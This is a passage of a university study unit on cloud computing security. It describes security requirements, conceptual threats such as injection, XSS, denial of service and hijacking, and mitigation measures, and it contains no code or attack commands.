UNIT 7 SECURITY ISSUES IN CLOUD
COMPUTING
Structure

7.0 Introduction
7.1 Objectives
7.2 Cloud Security
7.2.1 How Cloud Security is Different from Traditional IT Security?
7.2.2 Cloud Computing Security Requirements
7.3 Security Issues in Cloud Service Delivery Models
7.4 Security Issues in Cloud Deployment Models

7.4.1 Security Issues in Public Cloud


7.4.2 Security Issues in Private Cloud
7.4.3 Security Issues in Hybrid Cloud
7.5 Ensuring Security in Cloud Against Various Types of Attacks
7.6 Identity and Access Management (IAM)
7.6.1 Benefits of IAM
7.6.2 Types of Digital Authentication
7.6.3 IAM and Cloud Security
7.6.4 Challenges in IAM
7.6.5 Right Use of IAM Security
7.7 Security as a Service (SECaaS)
7.7.1 Benefits of SECaaS
7.8 Summary
7.9 Solutions/Answers
7.10 Further Readings

7.0 INTRODUCTION

The rise of cloud computing as an ever-evolving technology brings with it a


number of opportunities and challenges. Cloud is now becoming the back end
for all forms of computing, including the ubiquitous Internet of Things.

In the earlier unit, we had studied Load Balancing in Cloud computing and in
this unit we will focus on another important aspect namely Cloud Security in
cloud computing.

Cloud security is a discipline of cyber security dedicated to secure cloud


computing systems. This includes keeping data private and safe across online-
based infrastructure, applications, and platforms. Securing these systems
involves the efforts of cloud providers and the clients that use them, whether
an individual, small to medium business, or enterprise uses.

Cloud providers host services on their servers through always-on internet


connections. Since their business relies on customer trust, cloud security
methods are used to keep client data private and safely stored. However, cloud

1
Resource Provisioning,
Load Balancing and security also partially rests in the client’s hands as well. Understanding both
Security facets is pivotal to a healthy cloud security solution.

At its core, cloud security is composed of the following components:

 Data security
 Identity and access management (IAM)
 Governance (policies on threat prevention, detection, and mitigation)
 Data retention (DR) and business continuity (BC) planning
 Legal compliance

In this unit, you will study what is cloud security, how it is different from
traditional(legacy) IT security, cloud computing security requirements,
challenges in providing cloud security, threats, ensuring security, Identity and
Access management and Security-as-a-Service.

7.1 OBJECTIVES

After going through this unit, you shall be able to:

 understand cloud security and how it is different to that of traditional IT


security;
 list and describe various cloud computing security requirements;
 describe the challenges in providing cloud security;
 discuss various types of threats with respect to types of cloud services
and cloud deployment models;
 discuss different techniques to ensure cloud security against various
types of threats,
 elucidate the importance of identity and access management; and
 explain Security-as-a-Service

7.2 CLOUD SECURITY

Cloud security is the whole bundle of technology, protocols, and best practices
that protect cloud computing environments, applications running in the cloud,
and data held in the cloud. Securing cloud services begins with understanding
what exactly is being secured, as well as, the system aspects that must be
managed.

As an overview, backend development against security vulnerabilities is


largely within the hands of cloud service providers. Aside from choosing a
security-conscious provider, clients must focus mostly on proper service
configuration and safe use habits. Additionally, clients should be sure that any
end-user hardware and networks are properly secured.

The full scope of cloud security is designed to protect the following, regardless
of your responsibilities:

 Physical networks — routers, electrical power, cabling, climate


controls, etc.
2
Security Issues in
 Data storage — hard drives, etc. Cloud Computing
 Data servers — core network computing hardware and software
 Computer virtualization frameworks — virtual machine software,
host machines, and guest machines
 Operating systems (OS) — software that houses
 Middleware — application programming interface (API) management,
 Runtime environments — execution and upkeep of a running program
 Data — all the information stored, modified, and accessed
 Applications — traditional software services (email, tax software,
productivity suites, etc.)
 End-user hardware — computers, mobile devices, Internet of Things
(IoT) devices etc..

Cloud security may appear like traditional (legacy) IT security, but this
framework actually demands a different approach. Before diving deeper, let’s
first look how this is different to that of legacy IT security in the next section.

7.2.1 How Cloud Security is Different from Traditional IT Security?

Traditional IT security has felt an immense evolution due to the shift to cloud-
based computing. While cloud models allow for more convenience, always-on
connectivity requires new considerations to keep them secure. Cloud security,
as a modernized cyber security solution, stands out from legacy IT models in a
few ways.

Data storage: The biggest distinction is that older models of IT relied heavily
upon onsite data storage. Organizations have long found that building all IT
frameworks in-house for detailed, custom security controls is costly and rigid.
Cloud-based frameworks have helped offload costs of system development and
upkeep, but also remove some control from users.

Scaling speed: On a similar note, cloud security demands unique attention


when scaling organization IT systems. Cloud-centric infrastructure and apps
are very modular and quick to mobilize. While this ability keeps systems
uniformly adjusted to organizational changes, it does poses concerns when an
organization’s need for upgrades and convenience outpaces their ability to
keep up with security.

End-user system interfacing: For organizations and individual users alike,


cloud systems also interface with many other systems and services that must be
secured. Access permissions must be maintained from the end-user device
level to the software level and even the network level. Beyond this, providers
and users must be attentive to vulnerabilities they might cause through unsafe
setup and system access behaviors.

Proximity to other networked data and systems: Since cloud systems are a
persistent connection between cloud providers and all their users, this
substantial network can compromise even the provider themselves. In
networking landscapes, a single weak device or component can be exploited to
infect the rest. Cloud providers expose themselves to threats from many end-
users that they interact with, whether they are providing data storage or other
services. Additional network security responsibilities fall upon the providers
3
Resource Provisioning,
Load Balancing and who otherwise delivered products live purely on end-user systems instead of
Security their own.

Solving most cloud security issues means that users and cloud providers, both
in personal and business environments, both remain proactive about their own
roles in cyber security. This two-pronged approach means users and providers
mutually must address:

 Secure system configuration and maintenance.


 User safety education, both behaviorally and technically.

Ultimately, cloud providers and users must have transparency and


accountability to ensure both parties stay safe.

7.2.2 Cloud Computing Security Requirements

There are four main cloud computing security requirements that help to ensure
the privacy and security of cloud services: confidentiality, integrity,
availability, and accountability.

Confidentiality

Confidentiality requires blocking unauthorized exposure of cloud computing


service user’s information. Cloud providers charge users to guarantee
confidentiality, the focus will be on authentication of cloud resources (e.g.,
requiring a username and password for each user). Moreover, access control is
an important part of confidentiality in cloud computing. Neither access control
nor authentication works with a compromised cloud computing system, as it is
much harder to block unauthorized information disclosure on such a system.
Many approaches to protecting users’ sensitive cloud data are based on
encryption and data segmentation. If a provider’s server is compromised, data
segmentation reduces the amount of sensitive data that is disclosed. Data
segmentation also has other advantages; for instance, if the entire server is
compromised, only a small amount of user data is leaked, and downtime is
reduced. A cover channel is another potential confidentiality issue in a cloud
computing system; cover channels can cause information leaks through
unauthorized transmission paths.

Cloud computing providers use service-level agreements (SLAs) method to


resolve security issues for customer. Thus, providers of cloud services should
join to create standards for SLAs. Virtualization is the main aspect of the cloud
computing system; therefore many researchers have proposed techniques for
using virtualized systems to implement security goals.

Confidentiality is a part of cloud service that the provider must guarantee,


along with control of the cloud infrastructure. The provider should guarantee
confidential access to the data by ensuring trusted data sharing or through the
use of authorized data access. Therefore, there are huge barriers with the
growth of the CC system between the privacy of the user and security of the
data.

4
Security Issues in
Integrity Cloud Computing

One goal of using cloud computing systems is to utilize a variety of resources.


That is why cloud computing support all data and why many users stick to the
same clouds. Users also desire the ability to change or update existing data or
to add new data to the cloud. Therefore, data access should be controlled to
ensure data integrity. As with confidentiality, integrity requires access control
and authentication. Thus, if the cloud system is compromised by a weak
password, the cloud data’s integrity will not be protected. To overcome this
huge challenge, providers use virtualization-based dynamic integrity to help
clients use cloud services without interrupting the providers’ work with other
clients. Such a method is useful for ensuring integrity and security with
satisfactory performance and cost. Another method, value-atrisk, helps to
ensure suitable security and integrity. The cloud-based governance design
principles guarantees integrity and security by controlling the path between the
provider and the enterprise client. Another method provides a test of
information integrity based on an Service Level Agreement (SLA) between the
provider and the client. The consumer can use this SLA to verify the accuracy
of the cloud information. In a blind execution of services, the client transfers
each type of information through the cloud computing system using a separate
process. In the trusted computing method, blind processing is used to ensure
the integrity of the client’s data. This method separates the execution
environment from the system, so that the system’s hardware and computing
base can be secured and the credentials’ accuracy can be verified.

Availability

Availability is the ability for the consumer to utilize the system as expected.
One of the significant advantages of a cloud computing is its data availability.
Cloud computing enhances availability through authorized entry. In addition,
availability requires timely support and robust equipment. A client’s
availability may be ensured as one of the terms of a contract; to guarantee
availability, a provider may secure huge capacity and excellent architecture.
Because availability is a main part of the cloud computing system, increased
use of the environment will increase the possibility of a lack of availability and
thus could reduce the cloud computing system’s performance. Cloud
computing affords clients two ways of paying for cloud services: on-demand
resources and (the cheaper option) resource reservation. The optimal virtual-
machine (VM) placement mechanism helps to reduce the cost of both payment
methods. By reducing the cost of running VMs for many cloud providers, it
supports expected changes in demand and price. This method involves the
client making a declaration to pay for certain resources owned by the cloud
computing providers using the Session Initiation Protocol (SIP) optimal
solution.

Accountability

Accountability involves verifying the clients’ various activities in the data


clouds. Accountability is achieved by verifying the information that each client
supplies (and that is logged in various places in information clouds). Directly
connecting all activities to a client’s account is not always satisfactory. Neither
the client nor the provider takes all the responsibility for a system breakdown.
Thus, both the client and the provider must maintain accountability in case
5
Resource Provisioning,
Load Balancing and disputes occur. Thus, one of them will need to log any incidents for future
Security auditing, clearly identify each incident, and provide the necessary equipment
for logging such transactions. As an example, when a client’s account is
compromised in an attack, the client can no longer perform certain activities.
Thus, the cloud service providers need to have saved sufficient information to
restore the compromised account and identify the exceptional behavior.
Tracing even the smallest actions that happen in the clouds could ensure
accountability; such tracking will identify the client or entity that is responsible
for any given disaster. Evidence should be logged for each activity once it
starts processing. The transaction log can then be used during the examination
to determine the aptness of the evaluation. Accountability is a challenge in a
cloud system because misconfigured devices can produce unreliable
calculation results. In addition, when clients rent insufficient resources for their
tasks, this could reduce the performance of the provided services. A virus can
also destroy clients’ data, and a provider can fail to deliver data on time or
even lose data.

7.2.3 Challenges in Cloud Security

Following are some of the key security challenges in cloud computing:

Authentication: Throughout the internet data stored by cloud user is available


to all unauthorized people. Henceforth the certified user and assistance cloud
must have interchangeability administration entity.

Access Control: To check and promote only legalized users, cloud must have
right access control policies. Such services must be adjustable, well planned,
and their allocation is overseeing conveniently. The approach governor
provision must be integrated on the basis of Service Level Agreement (SLA).

Policy Integration: There are many cloud providers such as Amazon, Google
which are accessed by end users. Minimum number of conflicts between their
policies because they user their own policies and approaches.

Service Management: In this different cloud providers such as Amazon,


Google, comprise together to build a new composed services to meet their
customers need. At this stage there should be procure divider to get the easiest
localized services.

Trust Management: The trust management approach must be developed as


cloud environment is service provider and it should include trust negotiation
factor between both parties such as user and provider. For example, to release
their services provider must have little bit trust on user and users have same
trust on provider.

In the follow sections let us discuss major threats and issues in cloud
computing with respect to the cloud service delivery models and cloud
deployment models.

6
Security Issues in
 Check Your Progress 1 Cloud Computing

1) Why security is important in Cloud?

…………………………………………………………………………………………
…………………………………………………………………………………………
…………………………………………………………………………………………
2) How does cloud security work?

…………………………………………………………………………………………
…………………………………………………………………………………………
3) Mention various cloud security risks and discuss briefly.
…………………………………………………………………………………………
…………………………………………………………………………………………

7.3 SECURITY ISSUES IN CLOUD SERVICE


DELIVERY MODELS

The main concern in cloud environments is to provide security around multi-


tenancy and isolation, giving customers more comfort besides “trust us” idea
of clouds. There has been survey works reported, which classifies security
threats in cloud based on the nature of the service delivery models (SaaS,
PaaS, IaaS) of a cloud computing system. However, security requires a holistic
approach. Service delivery model is one of many aspects that need to be
considered for a comprehensive survey on cloud security. Security at different
levels such as Network level, Host level and Application level is necessary to
keep the cloud up and running continuously. In accordance with these different
levels, various types of security breaches may occur which have been
classified in this section.

 Data Threats including data breaches and data loss


 Network Threats including account or service hijacking, and
denial of service, and
 Cloud Environment Specific Threats including insecure
interfaces and APIs, malicious insiders, abuse of cloud services,
insufficient due diligence, and shared technology vulnerabilities

7.3.1 Data Threats

Data is considered to be one the most important valuable resource of any


organization and the number of customers shifting their data to cloud is
increasing every day. Data life cycle in cloud comprises of data creation,
transit, execution, storage and destruction. Data may be created in client or
server in cloud, transferred in cloud through network and stored in cloud
storage. When required data is shifted to execution environment where it can
be processed. Data can be deleted by its owner to complete its destruction. The
biggest challenge in achieving cloud computing security is to keep data secure.
7
Resource Provisioning,
Load Balancing and The major issues that arise with the transfer of data to cloud are that the
Security customers don’t have the visibility of their data and neither do they know its
location. They need to depend on the service provider to ensure that the
platform is secure, and it implements necessary security properties to keep
their data safe. The data security properties that must be maintained in cloud
are confidentiality, integrity, authorization, availability and privacy. However,
many data issues arise due to improper handling of data by the cloud provider.
The major data security threats include data breaches, data loss, unauthorized
access, and integrity violations. All of these issues occur frequently on cloud
data.

7.3.1.1 Data Breaches

Data breach is defined as the leakage of sensitive customer or organization


data to unauthorized user. Data breach from organization can have a huge
impact on its business regarding finance, trust and loss of customers. This may
happen accidently due to flaws in infrastructure, application designing,
operational issues, insufficiency of authentication, authorization, and audit
controls. Moreover, it can also occur due to other reasons such as the attacks
by malicious users who have a virtual machine (VM) on the same physical
system as the one they want to access in unauthorized way. In recent past,
Apple’s iCloud users faced a data leakage attack recently in which an attempt
was made to gain access to their private data. Such attacks have also been done
at other companies cloud such as Microsoft, Yahoo and Google. An example
of data breach is cross VM side channel attack that extracts cryptographic keys
of other VMs on the same system and can access their data.

7.3.1.2 Data Loss

Data loss is the second most important issue related to cloud security. Like
data breach, data loss is a sensitive matter for any organization and can have a
devastating effect on its business. Data loss mostly occurs due to malicious
attackers, data deletion, data corruption, loss of data encryption key, faults in
storage system, or natural disasters. In 2013, 44% of cloud service providers
have faced brute force attacks that resulted in data loss and data leakage.
Similarly, malware attacks have also been targeted at cloud applications
resulting in data destruction.

7.3.1.3 SQL Injection Attacks

SQL injection attacks, are the one in which a malicious code is inserted into a
standard SQL code. Thus the attackers gain unauthorized access to a database
and are able to access sensitive information. Sometimes the hacker’s input data
is misunderstood by the web-site as the user data and allows it to be accessed
by the SQL server and this lets the attacker to have know-how of the
functioning of the website and make changes into that. Various techniques
like: avoiding the usage of dynamically generated SQL in the code, using
filtering techniques to sanitize the user input etc. are used to check the SQL
injection attacks. Some researchers proposed proxy based architecture towards
preventing SQL Injection attacks which dynamically detects and extracts
users’ inputs for suspected SQL control sequences.

7.3.1.4 Cross Site Scripting(XSS) Attacks


8
Security Issues in
Cross Site Scripting (XSS) attacks, which inject malicious scripts into Web Cloud Computing
contents have become quite popular since the inception of Web 2.0. There are
two methods for injecting the malicious code into the web-page displayed to
the user namely - Stored XSS and Reflected XSS. In a Stored XSS, the
malicious code is permanently stored into a resource managed by the web
application and the actual attack is carried out when the victim requests a
dynamic page that is constructed from the contents of this resource. However,
in case of a Reflected XSS, the attack script is not permanently stored; in fact it
is immediately reflected back to the user.

7.3.2 Network Threats

Network plays an important part in deciding how efficiently the cloud services
operate and communicate with users. In developing most cloud solutions,
network security is not considered as an important factor by some
organizations. Not having enough network security creates attacks vectors for
the malicious users and outsiders resulting in different network threats. Most
critical network threats in cloud are account or service hijacking, and denial of
service attacks.

7.3.2.1 Denial of Service(DoS)

Denial of Service (DOS) attacks are done to prevent the legitimate users from
accessing cloud network, storage, data, and other services. DOS attacks have
been on rise in cloud computing in past few years and 81% customers consider
it as a significant threat in cloud. They are usually done by compromising a
service that can be used to consume most cloud resources such as computation
power, memory, and network bandwidth. This causes a delay in cloud
operations, and sometimes cloud is unable to respond to other users and
services. Distributed Denial of Service (DDOS) attack is a form of DOS
attacks in which multiple network sources are used by the attacker to send a
large number of requests to the cloud for consuming its resources. It can be
launched by exploiting the vulnerabilities in web server, databases, and
applications resulting in unavailability of resources.

7.3.2.2 Account or Service Hijacking

Account hijacking involves the stealing of user credentials to get an access to


his account, data or other computing services. These stolen credentials can be
used to access and compromise cloud services. The network attacks includes
phishing, fraud, Cross Site Scripting (XSS), Botnets and software
vulnerabilities such as buffer overflow result in account or service hijacking.
This can lead to the compromise of user privacy as the attacker can eavesdrop
on all his operations, modify data, and redirect his network traffic.

7.3.2.3 Man in the Middle Attack (MITM)

In such an attack, an entity tries to intrude in an ongoing conversation between


a sender and a client to inject false information and to have knowledge of the
important data transferred between them. Various tools implementing strong
encryption technologies like: Dsniff, Cain, Ettercap, Wsniff, Airjack etc. have
been developed in order to provide safeguard against them.

9
Resource Provisioning,
Load Balancing and Another cause may be due to improper configuration of Secure Socket Layer
Security (SSL). For example, if SSL was improperly configured, then the middle party
could hew data. The preventive measure for this attack was before
communication with other parties, SSL should be properly organized.

7.3.2.4 Network Sniffing

It is an important dispute in which plain text were hewed over network. An


invader could snip passwords, which were improperly encrypted during
communication. If encryption techniques for data security were not used, then
attacker could enter as a third party and seize the data. Encryption methods are
deployed for securing their data.

7.3.2.5 Port Scanning

It is an important dispute in which an attack might happen as port 80 (HTTP)


was always opened for provisioning web services. Other ports like 21 (FTP),
etc., would be unlocked when needed. Firewall was a counter measure to safe
the data from disruption in port.

7.3.2.6 Conceded Credentials and Wrecked Authentication

Authentication management is always a challenge for organizations to tackle


and solve to close loopholes and prevent attackers from accessing permissions.

Brute Force Attacks: The attacker attempts to crack the password by guessing
all potential passwords.

Shoulder Surfing: This threat is espionage, which means the attacker is


watching and spying on the user’s motions in attempt to know the passwords.

Replay Attacks: Also known as reflection attacks, replay attacks are a type of
attack that targets a user’s authentication process.

Key loggers: This is a program that records every key pressed by the user and
tracks their behavior.

7.3.2.7 Border Gateway Protocol (BGP) Prefix Hijacking

Prefix hijacking is a type of network attack in which a wrong announcement


related to the IP addresses associated with an Autonomous system (AS) is
made. Hence, malicious parties get access to the untraceable IP addresses. On
the internet, IP space is associated in blocks and remains under the control of
ASs. An autonomous system can broadcast information of an IP contained in
its regime to all its neighbours. These ASs communicate using the Border
Gateway Protocol (BGP) model. Sometimes, due to some error, a faulty AS
may broadcast wrongly about the IPs associated with it. In such case, the actual
traffic gets routed to some IP other than the intended one. Hence, data is leaked
or reaches to some other unintended destination.

7.3.2.8 Distributed Denial of Service Attacks (DDoS)

DDoS may be called an advanced version of DoS in terms of denying the


important services running on a server by flooding the destination sever with
10
Security Issues in
large numbers of packets such that the target server is not able to handle it. In Cloud Computing
DDoS the attack is relayed from different dynamic networks which have
already been compromised unlike the DoS attack. The attackers have the
power to control the flow of information by allowing some information
available at certain times. Thus the amount and type of information available
for public usage is clearly under the control of the attacker [87]. The DDoS
attack is run by three functional units: A Master, A Slave and A Victim.
Master being the attack launcher is behind all these attacks causing DDoS,
Slave is the network which acts like a launch pad for the Master. It provides
the platform to the Master to launch the attack on the Victim. Hence it is also
called as co-ordinated attack. Basically a DDoS attack is operational in two
stages: the first one being Intrusion phase where the Master tries to
compromise less important machines to support in flooding the more important
one. The next one is installing DDoS tools and attacking the victim server or
machine. Hence, a DDoS attack results in making the service unavailable to
the authorized user similar to the way it is done in a DoS attack but different in
the way it is launched. A similar case of Distributed Denial of Service attack
was experienced with CNN news channel website leaving most of its users
unable to access the site for a period of three hours. In general, the approaches
used to fight the DDoS attack involve extensive modification of the underlying
network. These modifications often become costly for the users. Swarm based
logic for guarding against the DDoS attack were provided. This logic provides
a transparent transport layer, through which the common protocols such as
HTTP, SMTP, etc. can pass easily. The use of IDS in the virtual machine is
proposed to protect the cloud from DDoS attacks. A SNORT like intrusion
detection mechanism is loaded onto the virtual machine for sniffing all traffics,
either incoming, or outgoing. Another method commonly used to guard against
DDoS is to have intrusion detection systems on all the physical machines
which contain the user’s virtual machines.

7.3.3 Cloud Environment Specific Threats

Cloud service providers are largely responsible for controlling the cloud
environment. Some threats are specific to cloud computing such as cloud
service provider issues, providing insecure interfaces and APIs to users,
malicious cloud users, shared technology vulnerabilities, misuse of cloud
services, and insufficient due diligence by companies before moving to cloud.

7.3.3.1 Insecure Interfaces and API’s

Application Programming Interface (API) is a set of protocols and standards


that define the communication between software applications through Internet.
Cloud APIs are used at all the infrastructure, platform and software service
levels to communicate with other services. Infrastructure as a Service (IaaS)
APIs are used to access and manage infrastructure resources including network
and VMs, Platform as a Service (PaaS) APIs provide access to the cloud
services such as storage and Software as a Service (SaaS) APIs connect
software applications with the cloud infrastructure. The security of various
cloud services depends on the APIs security. Weak set of APIs and interfaces
can result in many security issues in cloud. Cloud providers generally offer
their APIs to third party to give services to customers. However, weak APIs
can lead to the third party having access to security keys and critical
information in cloud. With the security keys, the encrypted customer data in
11
Resource Provisioning,
Load Balancing and cloud can be read resulting in loss of data integrity, confidentiality and
Security availability. Moreover, authentication and access control principles can also be
violated through insecure APIs.

7.3.3.2 Malicious Insiders

A malicious insider is someone who is an employee in the cloud organization,


or a business partner with an access to cloud network, applications, services, or
data, and misuses his access to do unprivileged activities. Cloud administrators
are responsible for managing, governing, and maintaining the complete
environment. They have access to most data and resources, and might end up
using their access to leak that data. Other categories of malicious insiders
involve hobbyist hackers who are administrators that want to get unauthorized
sensitive information just for fun, and corporate espionage that involves
stealing secret information of business for corporate purposes that might be
sponsored by national governments.

7.3.3.3 Abuse of Cloud Services

The term abuse of cloud services refers to the misuse of cloud services by the
consumers. It is mostly used to describe the actions of cloud users that are
illegal, unethical, or violate their contract with the service provider. In 2010,
abusing of cloud services was considered to be the most critical cloud threat
and different measures were taken to prevent it. However, 84% of cloud users
still consider it as a relevant threat. Research has shown that some cloud
providers are unable to detect attacks launched from their networks, due to
which they are unable to generate alerts or block any attacks. The abuse of
cloud services is a more serious threat to the service provider than service
users. For instance, the use of cloud network addresses for spam by malicious
users has resulted in blacklisting of all network addresses, thus the service
provider must ensure all possible measures for preventing these threats. Over
the years, different attacks have been launched through cloud by the malicious
users. For example, Amazon’s EC2 services were used as a command and
control servers to launch Zeus botnet in 2009. Famous cloud services such as
Twitter, Google and Facebook as a command and control servers for launching
Trojans and Botnets. Other attacks that have been launched using cloud are
brute force for password cracking of encryption, phishing, performing DOS
attack against a web service at specific host, Cross Site Scripting and SQL
injection attacks.

7.3.3.4 Insufficient Due Diligence

The term due diligence refers to individuals or customers having the complete
information for assessments of risks associate with a business prior to using its
services. Cloud computing offers exciting opportunities of unlimited
computing resources, and fast access due which number of businesses shift to
cloud without assessing the risks associated with it. Due to the complex
architecture of cloud, some of organization security policies cannot be applied
using cloud. Moreover, the cloud customers have no idea about the internal
security procedures, auditing, logging, data storage, data access which results
in creating unknown risk profiles in cloud. In some cases, the developers and
designers of applications maybe unaware of their effects from deployment on
cloud that can result in operational and architectural issues.
12
Security Issues in
7.3.3.5 Shared Technology Vulnerabilities Cloud Computing

Cloud computing offers the provisioning of services by sharing of


infrastructure, platform and software. However, different components such as
CPUs, and GPUs may not offer cloud security requirements such as perfect
isolation. Moreover, some applications may be designed without using trusted
computing practices due to which threats of shared technology arise that can be
exploited in multiple ways. In recent years, shared technology vulnerabilities
have been used by attackers to launch attacks on cloud. One such attack is
gaining access to the hypervisor to run malicious code, get unauthorized access
to the cloud resources, VMs, and customer’s data. Xen platform is an open
source solution used to offer cloud services.

Earlier Xen hypervisors code used to create local privilege escalation (in which
a user can have rights of another user) vulnerability that can launch guest to
host VM escape attack. Later, Xen updated the code base of its hypervisor to
fix that vulnerability. Other companies such as Microsoft, Oracle and SUSE
Linux those based on Xen also released updates of their software to fix the
local privilege escalation vulnerability. Similarly, a report released in 2009,
showed the usage of VMware to run code from guests to hosts showing the
possible ways to launch attacks.

7.3.3.6 Inadequate Change Control and Misconfiguration

If an asset is set up wrong, it may suffer from misconfiguration, making it


exposed to attacks. Misconfiguration has now become a major source of data
leaks and unwarranted resource modification. The lack of adequate change
control may be a prevalent cause of misconfiguration. Depending on the nature
of the misconfiguration and how soon it is recognized and remedied, a
misconfigured item might have a significant business impact. Storage objects
left unsecured, unmodified default passwords and default settings, and
removing basic security safeguards are all examples of misconfiguration.

7.3.3.7 Limited Cloud Usage Visibility

Limited cloud usage visibility means when an organization is unable to


determine whether a service running on its platform is secure or harmful.
Unsanctioned app use and sanctioned app misuse are the two most common
categories. When users use apps and services without permission, the former
occurs. Authorized users utilize a sanctioned application in the latter case. This
could result in unauthorized data access and the entry of malware into the
system.

7.3.3.8 Loss of Operational and Security Logs

The lack of operational logs makes evaluating operational variables difficult.


When data is unavailable for analysis, the options for resolving difficulties are
limited. The loss of security logs poses a threat to the security management
program’s application management

7.3.3.9 Failure of Isolation

13
Resource Provisioning,
Load Balancing and There is a lack of strong isolation or compartmentalization of routing,
Security reputation, storage, and memory among tenants. Because of the lack of
isolation, attackers attempt to take control of the operations of other cloud
users to obtain unauthorized access to the data.

7.3.3.10 Risks of Noncompliance

Organizations seeking compliance with standards and legislation may be at


danger if the Cloud Service Provider cannot ensure adherence of the
requirements, outsources cloud administration to third parties, and/or refuses to
allow client audits. This danger arises from a lack of oversight over audits and
industry standard evaluation. As a result, cloud platform users are unaware of
provider protocols and practices in the areas of identity management, access,
and separation of roles.

7.3.3.11 Attacks against Cryptography

Cloud services are vulnerable to cryptanalysis due to insecure or outdated


encryption. If criminal users take control of the cloud, data stored there may be
encoded to prevent it from being read. Although fundamental errors in the
design of cryptographic algorithms which may cause suitable encryption
algorithms to become weak, there are also unique ways to break cryptography.
By evaluating accessible places and tracking clients’ query access habits,
incomplete information can be extracted from encrypted data.

7.3.3.12 Attacks through a Backdoor Channel

The attackers can gain access to remote system applications on the victim’s
resource systems via this approach. It’s a passive attack of sorts. Zombies are
sometimes used by attackers to carry out DDoS attacks. Back doors channels,
however, are frequently used by attackers to get control of the victim’s
resources. It has the potential to compromise data security and privacy.

7.4 SECURITY ISSUES IN CLOUD DEPLOYMENT


MODELS

Each of the three ways (Public, Private, Hybrid) in which cloud services can
be deployed has its own advantages and limitations. And from the security
perspective, all the three have got certain areas that need to be addressed with a
specific strategy to avoid them.

7.4.1 Security Issues in a Public Cloud

In a public cloud, there exist many customers on a shared platform and


infrastructure security is provided by the service provider. A few of the key
security issues in a public cloud include:

 The three basic requirements of security: confidentiality, integrity and


availability are required to protect data throughout its lifecycle. Data
must be protected during the various stages of creation, sharing,
archiving, processing etc. However, situations become more

14
Security Issues in
complicated in case of a public cloud where we do not have any control Cloud Computing
over the service provider’s security practices.
 In case of a public cloud, the same infrastructure is shared between
multiple tenants and the chances of data leakage between these tenants
are very high. However, most of the service providers run a multitenant
infrastructure. Proper investigations at the time of choosing the service
provider must be done in order to avoid any such risk.
 In case a Cloud Service Provider uses a third party vendor to provide its
cloud services, it should be ensured what service level agreements they
have in between as well as what are the contingency plans in case of
the breakdown of the third party system.
 Proper SLAs defining the security requirements such as what level of
encryption data should undergo, when it is sent over the internet and
what are the penalties in case the service provider fails to do so.

Although data is stored outside the confines of the client organization in a


public cloud, we cannot deny the possibility of an insider attack originating
from service provider’s end. Moving the data to a cloud computing
environment expands the circle of insiders to the service provider’s staff and
subcontractors. Policy enforcement implemented at the nodes and the data-
centres can prevent a system administrator from carrying out any malicious
action. The three major steps to achieve this are: defining a policy, propagating
the policy by means of a secure policy propagation module and enforcing it
through a policy enforcement module.

7.4.2 Security Issues in a Private Cloud

A private cloud model enables the customer to have total control over the
network and provides the flexibility to the customer to implement any
traditional network perimeter security practice. Although the security
architecture is more reliable in a private cloud, yet there are issues/risks that
need to be considered:

 Virtualization techniques are quite popular in private clouds. In such a


scenario, risks to the hypervisor should be carefully analyzed. There
have been instances when a guest operating system has been able to run
processes on other guest VMs or host. In a virtual environment it may
happen that virtual machines are able to communicate with all the VMs
including the ones who they are not supposed to. To ensure that they
only communicate with the ones which they are supposed to, proper
authentication and encryption techniques such as IPsec [IP level
Security] etc. should be implemented.
 The host operating system should be free from any sort of malware
threat and monitored to avoid any such risk. In addition, guest virtual
machines should not be able to communicate with the host operating
system directly. There should be dedicated physical interfaces for
communicating with the host.
 In a private cloud, users are facilitated with an option to be able to
manage portions of the cloud, and access to the infrastructure is
provided through a web interface or an HTTP end point. There are two
ways of implementing a web-interface, either by writing a whole
application stack or by using a standard applicative stack, to develop

15
Resource Provisioning,
Load Balancing and the web interface using common languages such as Java, PHP, Python
Security etc. As part of screening process, Eucalyptus web interface has been
found to have a bug, allowing any user to perform internal port
scanning or HTTP requests through the management node which he
should not be allowed to do. In the nutshell, interfaces need to be
properly developed and standard web application security techniques
need to be deployed to protect the diverse HTTP requests being
performed.
 While we talk of standard internet security, we also need to have a
security policy in place to safeguard the system from the attacks
originating within the organization. This vital point is missed out on
most of the occasions, stress being mostly upon the internet security.
Proper security guidelines across the various departments should exist
and control should be implemented as per the requirements.

Thus we see that although private clouds are considered safer in comparison to
public clouds, still they have multiple issues which if unattended may lead to
major security loopholes as discussed earlier.

7.4.3 Security Issues in a Hybrid Cloud

The hybrid cloud model is a combination of both public and private cloud and
hence the security issues discussed with respect to both are applicable in case
of hybrid cloud.

In the following section the security methods to avoid the exploitation of the
threats will be discussed.

7.5 ENSURING SECURITY IN CLOUD AGAINST


VARIOUS TYPES OF ATTACKS

This section describes the implementation of various security techniques at


different levels to secure cloud from the above said threats.

7.5.1 Protection from Data Breaches

Various security measures and techniques have been proposed to avoid the
data breach in cloud. One of these is to encrypt data before storage on cloud,
and in the network. This will need efficient key management algorithm, and
the protection of key in cloud. Some measures that must be taken to avoid data
breaches in cloud are to implement proper isolation among VMs to prevent
information leakage, implement proper access controls to prevent unauthorized
access, and to make a risk assessment of the cloud environment to know the
storage of sensitive data and its transmission between various services and
networks.

Many researchers worked on the protection of data in cloud storage.


CloudProof is a system that can be built on top of existing cloud storages like
Amazon S3 and Azure to ensure data integrity and confidentiality using
encryption. To secure data in cloud storage attributed based encryption can be
used to encrypt data with a specific access control policy before storage.
Therefore, only the users with access attributes and keys can access the data.
16
Security Issues in
Another technique to protect data in cloud involves using scalable and fine Cloud Computing
grained data access control. In this scheme, access policies are defined based
on the data attributes. Moreover, to overcome the computational overhead
caused by fine grained access control, most computation tasks can be handed
over to untrusted commodity cloud with disclosing data. This is achieved by
combining techniques of attribute based encryption, proxy re-encryption, and
lazy re-encryption.

7.5.2 Protection from Data Loss

To prevent data loss in cloud different security measures can be adopted. One
of the most important measures is to maintain backup of all data in cloud
which can be accessed in case of data loss. However, data backup must also be
protected to maintain the security properties of data such as integrity and
confidentiality. Various data loss prevention (DLP) mechanisms have been
proposed for the prevention of data loss in network, processing, and storage.
Many companies including Symantec, McAfee, and Cisco have also developed
solutions to implement data loss prevention across storage systems, networks
and end points. Trusted Computing can be used to provide data security. A
trusted server can monitor the functions performed on data by cloud server and
provide the complete audit report to data owner. In this way, the data owner
can be sure that the data access policies have not been violated.

In a nutshell, organizations should apply the following mitigation techniques to


protect against this type of threat:

 Provide data-storage and backup mechanisms.


 Use proper encryption techniques.
 Protect in-transit data.
 Generate strong keys and implement advanced storage and
management.
 Legally require suppliers to use reinforcement and maintenance
techniques

7.5.3 Protection from Account or Service Hijacking

